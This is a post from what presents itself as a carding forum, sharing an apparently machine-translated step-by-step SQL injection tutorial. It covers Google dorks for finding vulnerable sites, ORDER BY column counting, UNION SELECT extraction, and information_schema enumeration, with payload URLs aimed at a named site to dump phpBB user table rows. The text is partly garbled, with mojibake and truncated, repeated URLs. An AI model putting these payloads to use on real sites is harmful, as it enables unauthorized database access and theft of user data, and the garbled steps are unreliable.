Welcome to DevilGroup - Carding Forum - Free Premium Accounts

You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features such as download links. by joining our free
community you will have access to posts topics,communicate privately with other members (PM),respond to polls,upload content and access many other special features.
Registration is fast,simple and absolutely free so please,
 Click Sign up Button For Register 

- Advertisement Area -
For purchasing Ads contact ICQ : 623378515 
http://cloud-shack.com/ https://rescator.cm/
Sign in to follow this  
Mr Bomb

[SQL Injection Tutorial] Detailed!

1 post in this topic

I found on my harddrive very good "tutorial" found, that shows you easily what you can do with a "SQL Injection" ...

It will "step by step," explains what you need to do if you found an "SQL injection" ... in my opinion one of the best tutorials on the topic "SQL Injection" ... I would like in this way also thanks again for "godfather" the author of the tutorial many times that he himself has taken the time to write the tutorial

So now a lot of fun with the tutorial

Here is a tutorial for the 'pretty simple way of an SQL Injection'

First Google ~ Dorkz

Second beginning

Third By Order +

4th Union + Select, version, database

5th Tables

6th Columns

7th data

8th Thanks for reading

First Google ~ Dorkz

- This single pair Google dorks, so you can search for SQLi Vuln-s.

SQLI Dorks - ~ ~ XakNet Forum

Second beginning

-So we are looking to start our first time a page from where we think that this SQLi Vuln-is.

Example:

Code:

http://modules.t-o-m-e.net/script.php?id=24'>http://modules.t-o-m-e.net/script.php?id=24

Now we are only just beginning to an apostrophe turn back to the URL:

Code:

http://modules.t-o-m-e.net/script.php?id=24

'

If an error is returned to us now, we have found a Vuln.

On this example page to make the error, apparent by the following:

Code:

"You have an error in your SQL syntax; check the manual that Corresponds to your MySQL server version for the right syntax to use near '\''at line 1"

+ By 3.Order

-Now we calculate using the SQL Command "Order + By" the Column number:

This tactic works like this:

We query the server to see if he has a certain number of column's, if NOT, then we return the page to output an error (This is, then she's column side has asked LESS than us)

If the site does not raise errors, it means that the page number of this column's either has or more.

For this we depend on the command "Order + By + number" ran back to the Vuln URL.

Column number stands for our number to be queried ...

Let's test it at once an example:

Code:

http://modules.tome.net/script.php?id=24+order+by+10--

AT THE END IS ALWAYS 2 minus drangehÃ***131;¤ngt IN EVERY STEP OF THE WE WILL STILL MAKE!

This is asked whether the page has 10 columns. -> As a result we get an error, that is, the page has 10 columns but NOT less.

Now we just try a bit of rum ...

Code:

http://modules.tome.net/script.php?id=24+order+by+8--

Here NO error is issued, which means that the page has 8 columns, if we now make the opposite case:

Code:

http://modules.tome.net/script.php?id=24+order+by+9--

We see that he spends a mistake now we know: 9 Columns Columns = NO 8 = YES

4.Union + Select, version, database

-Now we have found the Column number thanks to the command "Order + By".

Column number = 8

This series, we now only once to the URL, and that by dranhÃ***131;¤ngen back to the URL of the SQL Command "+ union + select + number".

Number stands for the number of columns back, we have previously determined.

This is not indicated as a single number. Namely given any number from 1 to the maximum column-number. (In this case: 1,2,3,4,5,6,7,8)

Let's test it to our example:

Code:

T.o.M.E. Library - Script 'zangband mutations (20kB)'

Now, the individual numbers on the displayed page spread, as the text of the page usually sucks, we have a MINUS set behind the ID, this invalidation is done:

Example:

To note here is the behind the 24 by MINUS: "id = 24"

Code:

T.o.M.E. Library - Script '2 '

Instead of the numbers we see now on the page, the version of MySQL we can, and can spend the Database.

Version command: "Version ()"

Database command: "Database ()"

Now we pick a number, from which we recognize to see visible /.

For this example I'll take the second

To read the version we replace the URL in the "2" with the version command: "version ()"

Example:

Code:

http://modules.tome.net/script.php?i...union+select+1'>http://modules.tome.net/script.php?i...union+select+1'>http://modules.tome.net/script.php?i...union+select+1'>http://modules.tome.net/script.php?i...union+select+1'>http://modules.tome.net/script.php?i...union+select+1'>http://modules.tome.net/script.php?i...union+select+1

, version () ,3,4,5,6,7,8 -

Now we are on this page the following Issued: 5.0.87

This means the MySQL version is: 5.0.87

We are interested in only the first number of the version. 4 To this we have the harder it later Tables, read columns, as we would have guessed it then itself.

As this page MySQL Version: has 5 we can allow ourselves to spend the TABLE_NAME automatically.

The same we can do with the database command, I take this back to "2" and replace it with the Database command: "database ()"

Example:

Code:

http://modules.tome.net/script.php?i...union+select+1

, database () ,3,4,5,6,7,8 -

The Database name of this site is, therefore: darkdb

The database name, we should now write down somewhere for the next steps.

5th Tables

-Now we have the Column number, version, and the database name.

If the MySQL version: is 5, then we can let the Table Names spend easily automatically.

By our count (in this case again, "2") with "GROUP_CONCAT (table_name)" substitute. Furthermore, we now go to the END of the URL and go BEFORE the 2 minus "-" and then use the following: + from + where + + INFORMATION_SCHEMA.TABLES table_schema = 0x "hex Database"

Database-Hex stands for the hex string for the database name:

I wrote a little program that converts the database name to a hex string.

- - Simply the database name (in this case: darkdb) above entered into the TextBox, and then appearing above hex string copying: 64:61:72:6 b: 64:62

We still remove the colons of the hex string, then we have the following string: 6461726b6462

Now we are all one time with an example:

Code:

http://modules.tome.net/script.php?i...union+select+1

, GROUP_CONCAT (table_name), 3,4,5,6, 7,8 + from + where + + INFORMATION_SCHEMA.TABLES table_sc hema 0x6461726b6462 = -

Now we are normally several table names listed next to each other, this we should now note somewhere.

6th Columns

-Now we pick out a Table_Name from which we wish to read our other columns:

In this example, I'll take the Table: phpbb3acl_users -> this issue, we only allow ourselves once again as a hex string. We do this again with the tool.

Then remove the colons yet, and we have the following hex string: 70687062623361636c5f7573657273

Now we remove the "GROUP_CONCAT (table_name)" with "GROUP_CONCAT (column_name)"

Then we remove from the previous step, the "+ from + where + + INFORMATION_SCHEMA.TABLES table_s chem a = 0x" hex Database "by" + from + where + + information_schema.columns Table_ name = 0x "Table Hex"

In our example looks like this:

Code:

http://modules.tome.net/script.php?i...union+select+1

, GROUP_CONCAT (column_name), 3,4,5, 6,7,8 + from + where + + information_schema.columns Table_ name = 0x70687062623361636c5f7573657273 -

Now we are re-issued a couple of columns, this we should note again.

I suppose for our example, the following columns: user_id

In this table, unfortunately, are not User_name, or User_passwÃ***131;¶rter, so I'll just user_id

7th Data

-Now we have a table and a column that we want to read from the table.

To allow us to output the data, we change "GROUP_CONCAT (column_name)" with "concat (user_id)"

From our previous step, we replace: "+ from + Database.TableName"

Database stands for the normal name of the database, ie: darkdb

table name stands for the normal table name we have chosen us, that is: phpbb3acl_users

Now we test it in our example:

Code:

http://modules.tome.net/script.php?i...union+select+1

, concat (user_id), 3,4,5,6,7,8 + from + darkdb.phpbb3acl_users--

Well we spent the user_id is the first line, in this case: 7

In order to vote in such a list up and down we can hang after the "+ from + darkdb.phpbb3acl_users" nor a "limit + +0.1"

It looks like this:

Code:

http://modules.tome.net/script.php?i...union+select+1

, concat (user_id), 3,4,5,6,7,8 + from + limit + + darkdb.phpbb3acl_users 0.1 -

If we now change the 0 to 1, we go one line up, and we read the next "user_id" made it to 2 if we make a new back up at some point no longer exists.

If we want to read several columns at once, eg in this case (Forum_id and user_id)

then we simply replace "concat (user_id)" with "concat (user_id, 0x3a, forum_id)"

the 0x3a stands for a colon, then the user_id is separated from the forum_id by a colon.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this